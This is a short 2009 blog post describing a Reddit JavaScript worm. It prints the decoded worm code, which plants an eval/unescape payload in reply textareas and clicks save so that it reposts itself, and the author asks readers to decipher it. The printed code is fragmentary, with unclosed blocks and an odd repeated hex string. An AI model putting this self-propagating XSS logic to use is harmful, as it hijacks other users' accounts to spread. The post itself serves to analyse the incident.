Reddit Javascript Worm?

September 27, 2009 – 10:13 PM

Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:

nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

    elements = document.getElementsByTagName('a');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML == 'reply') {

    elements = document.getElementsByTagName('textarea');

    for (i = 0; i < elements.length; i++)
        elements[i].value = nonsense;

    elements = document.getElementsByTagName('button');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML     == 'save'
        &&  elements[i].style.display != 'none') {


I’m not an expert so I can’t decipher what it’s doing up there with the nonsense bit. It looks like something akin to a quine. Any takers?

Update: sorry about the misleading title; I was under the mistaken impression that this was specific to Firefox. It appears to affect WebKit and Gecko browsers at least, but it didn’t hit me with Safari 4.


  1. One Response to “Reddit Javascript Worm?”

  2. It’s supposedly fixed already. Not a member to confirm.

    By manunkind on Sep 28, 2009

You must be logged in to post a comment.